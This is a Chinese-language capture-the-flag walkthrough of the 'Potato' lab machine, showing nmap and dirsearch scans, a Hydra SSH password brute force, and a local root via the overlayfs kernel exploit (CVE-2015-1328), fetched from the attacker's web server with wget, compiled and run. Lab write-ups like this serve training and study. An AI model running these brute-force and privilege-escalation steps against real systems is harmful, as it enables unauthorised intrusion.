信息收集

注:直接使用 VMware 导入 ova 即可。

  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1717sec preferred_lft 1717sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

  • 使用 Nmap 扫描出一个 IP:10.10.8.15
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~/Potato-Suncsr 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:12 CST
Nmap scan report for 10.10.8.1
Host is up (0.000082s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000072s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.15
Host is up (0.000046s latency).
MAC Address: 00:0C:29:FD:5A:29 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000024s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 14.41 seconds

端口扫描

  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
root at kali in ~/Potato-Suncsr 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.15 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:13 CST
Nmap scan report for 10.10.8.15
Host is up (0.000034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
|_http-title: Potato
7120/tcp open  unknown
MAC Address: 00:0C:29:FD:5A:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

服务识别

  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root at kali in ~/Potato-Suncsr 
$ nmap -p80,7120 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.15 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:14 CST
Nmap scan report for 10.10.8.15
Host is up (0.00062s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Potato
|_http-server-header: Apache/2.4.7 (Ubuntu)
7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
|   2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
|   256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_  256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 00:0C:29:FD:5A:29 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 10.10.8.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds

漏洞扫描

  • 使用 Nmap 进行漏洞扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root at kali in ~/Potato-Suncsr 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.15 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 10:14 CST
Nmap scan report for 10.10.8.15
Host is up (0.000069s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /info.php: Possible information file
MAC Address: 00:0C:29:FD:5A:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 320.79 seconds
  • 看了下扫出来的漏洞,没一个有用的。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root at kali in ~/Potato-Suncsr 
$ dirsearch -u http://10.10.8.15 -o $PWD/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Potato-Suncsr/dirsearch.txt
Error Log: /root/Potato-Suncsr/.dirsearch/logs/errors-24-06-14_10-17-13.log
Target: http://10.10.8.15/

[10:17:13] Starting: 
[10:17:14] 403 -  288B  - /.ht_wsr.txt                                     
[10:17:14] 403 -  291B  - /.htaccess.bak1                                  
[10:17:14] 403 -  292B  - /.htaccess_extra
[10:17:14] 403 -  293B  - /.htaccess.sample
......

root at kali in ~/Potato-Suncsr 
$ cat dirsearch.txt | grep 200
200   654B   http://10.10.8.15:80/index.html
200   86KB   http://10.10.8.15:80/info.php

漏洞利用

  • 依次访问扫描出的内容,很明显这是一个自建的站点:

image-20240614102508351

  • 发现一个 info.php 页面:

image-20240614102537976

  • 一个 phpinfo 的页面,顶多算个信息泄露,没什么大用。

SSH 爆破

  • 这里对于 80 端口而言暂时没有可以利用的地方,根据端口扫描结果来看还有一个 7120 端口,开放的是 SSH 服务,可以尝试使用 Hydra 进行 SSH 爆破:

注:从 index.html 页面来看,其实可以尝试使用 potato/Potato 当作用户名进行爆破的。

1
hydra -l potato -P /usr/share/wordlists/rockyou.txt -V ssh://10.10.8.15:7120
  • 根据爆破结果来看,账号密码为:potato/letmein。

image-20240614104800159

  • 使用获取到的用户名密码登陆一下:
1
2
3
4
5
6
7
8
9
root at kali in ~/Potato-Suncsr 
$ ssh potato@10.10.8.15 -p 7120
potato@10.10.8.15's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
Last login: Tue Sep  8 02:04:57 2020 from 192.168.17.172
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)

主机信息收集

  • 查看当前系统中可使用的用户:
1
2
3
potato@ubuntu:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
potato:x:1000:1000:Potato,,,:/home/potato:/bin/bash
  • 查看 potato 家目录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
potato@ubuntu:~$ ls -aRl /home/potato
/home/potato:
total 28
drwxr-xr-x 3 potato potato 4096 Sep  8  2020 .
drwxr-xr-x 3 root   root   4096 Sep  7  2020 ..
-rw------- 1 potato potato    3 Sep  8  2020 .bash_history
-rw-r--r-- 1 potato potato  220 Sep  7  2020 .bash_logout
-rw-r--r-- 1 potato potato 3637 Sep  7  2020 .bashrc
drwx------ 2 potato potato 4096 Sep  7  2020 .cache
-rw-r--r-- 1 potato potato  675 Sep  7  2020 .profile

/home/potato/.cache:
total 8
drwx------ 2 potato potato 4096 Sep  7  2020 .
drwxr-xr-x 3 potato potato 4096 Sep  8  2020 ..
-rw-r--r-- 1 potato potato    0 Sep  7  2020 motd.legal-displayed
  • 查看是否有 SUID 文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
potato@ubuntu:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/mount
/bin/su
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
  • 目前来看,都没有什么可用信息与文件。

内核提权

  • 既然啥也没有,那就上大招,查看靶机中是否有 gcc 编译器:
1
2
3
4
5
6
7
8
potato@ubuntu:~$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.4-2ubuntu1~14.04.4' --......
Thread model: posix
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
  • 查看当前系统内核版本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
potato@ubuntu:~$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

potato@ubuntu:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04 LTS"
NAME="Ubuntu"
VERSION="14.04, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
  • 在 Kali 中使用 searchsploit 工具查找对应内核/系统版本的漏洞:

image-20240614112155636

  • 这里选择第一个 37292.c,移动到当前目录进行操作:
1
2
3
4
5
6
7
8
9
10
11
12
13
root at kali in ~/Potato-Suncsr 
$ searchsploit -m 37292.c 
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
    Codes: CVE-2015-1328
 Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /root/Potato-Suncsr/37292.c

root at kali in ~/Potato-Suncsr 
$ ls
37292.c  nmap_ip.txt  nmap_port.txt  nmap_server.txt  nmap_vuln.txt
  • 由于需要将 37292.c 文件上传至靶机进行编译,在 Kali 本地使用 Python 开启一个 Web 服务:
1
2
3
4
root at kali in ~/Potato-Suncsr 
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  • 在靶机中使用 Wget 下载该文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
potato@ubuntu:~$ wget http://10.10.8.17/37292.c
--2024-06-13 20:26:54--  http://10.10.8.17/37292.c
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[===============================================>] 4,968       --.-K/s   in 0s      

2024-06-13 20:26:54 (936 MB/s) - ‘37292.c’ saved [4968/4968]

potato@ubuntu:~$ ls -l 37292.c 
-rw-rw-r-- 1 potato potato 4968 Jun 13 20:22 37292.c
  • 使用 gcc 将 37292.c 编译成可执行文件:
1
2
3
potato@ubuntu:~$ gcc 37292.c -o exp
potato@ubuntu:~$ ls -l exp
-rwxrwxr-x 1 potato potato 13652 Jun 13 20:29 exp
  • 执行 exp 文件:
1
2
3
4
5
6
7
8
9
10
11
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
potato@ubuntu:~$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare),1000(potato)
  • 成功获得 root 权限,查找 flag:
1
2
3
4
5
# cd /root
# ls
proof.txt
# cat proof.txt 
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b